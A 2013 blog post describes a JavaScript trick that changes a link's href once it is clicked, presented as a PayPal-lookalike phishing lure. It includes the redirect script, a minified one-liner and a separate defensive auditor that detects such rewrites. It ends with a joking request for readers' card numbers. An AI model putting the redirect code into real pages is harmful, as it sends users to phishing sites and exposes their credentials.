Hacking <a>

21 March 2013


So, I recently came across this article about modifying the href attribute of the <a> tag after it has been clicked. That's right, after. And JavaScript allows you to do that.

Although this may not seem like a serious threat, or even a threat at all, at first glance, it's a pretty sweet phishing tool. Say you're redirected to PayPal for some purchase you're about to make, from some site. The link will pass all the malicious-link-detecting extensions or add-ons you might have, 'cause it's PayPal, right? That's legit. But what happens after you click it? I redirect you to a site called http://gaypal.com (hehe) or something subtly similar to that. And I reel you in. It's a catch.

How simple is this?

var links = document.links;
for(i in links) {
    links[i].onclick = function(){
        this.href = 'http://gaypal.com';
    };
}

Simple.

And the compressed version?

o=document.links;for(i in o){o[i].onclick=function(){this.href='//gaypal.com'}}

Simpler.

And I have to admit, the simplicity of this awesome hack blew my mind. But there is no reason for concern, as the top players have already fixed it.

Btw, can someone check on IE please?
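
For anyone auditing a page for this trick, here is an added example (not from the original article or this post) that runs each link's onclick handler and reports links whose href differs afterwards. The link objects and example.* hosts are constructed stand-ins, and it only inspects the onclick property, not listeners attached with addEventListener.

```javascript
// Added example: flags links whose destination changes when their onclick
// handler runs. Link objects only need `href` and `onclick`, so the same
// function also accepts Array.from(document.links) in a browser.
function hostOf(href, base) {
  try {
    return new URL(href, base).host;
  } catch (e) {
    return null; // unparsable destination
  }
}

function findClickTimeRewrites(links, base) {
  const findings = [];
  for (const link of links) {
    if (typeof link.onclick !== 'function') continue;
    const shown = link.href; // what hovering and link scanners see
    try {
      // Run the handler the way the browser would, with `this` = the link.
      link.onclick.call(link, { type: 'click', target: link, preventDefault() {} });
    } catch (e) {
      // A throwing handler is not a rewrite; carry on.
    }
    const actual = link.href; // where the click would really go
    link.href = shown;        // undo the rewrite after inspection
    if (actual !== shown) {
      findings.push({
        shown,
        actual,
        crossHost: hostOf(shown, base) !== hostOf(actual, base),
      });
    }
  }
  return findings;
}

// Constructed sample data (hypothetical hosts under example.*).
const BASE = 'https://shop.example/checkout';
const sampleLinks = [
  { href: 'https://pay.example/login', onclick: null },
  { href: 'https://pay.example/login', // the pattern from the post
    onclick() { this.href = '//pay-login.example.net/'; } },
  { href: 'https://shop.example/cart', // same-host rewrite, lower risk
    onclick() { this.href = 'https://shop.example/cart?src=nav'; } },
];

console.log(findClickTimeRewrites(sampleLinks, BASE));
```

The crossHost flag separates a swap to another host, which is the phishing case described above, from same-host rewrites such as tracking parameters.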




P.S. Promoting general phishing and web-safety awareness, I have created a tool to check if your credit card is on any cracker's watch list. All you gotta do is send me your card number, CVV number and expiry date and I'll let you know ASAP.
Aww.. No need to thank me. Anytime.

P.P.S Here's the original article which has been receiving some amazing responses.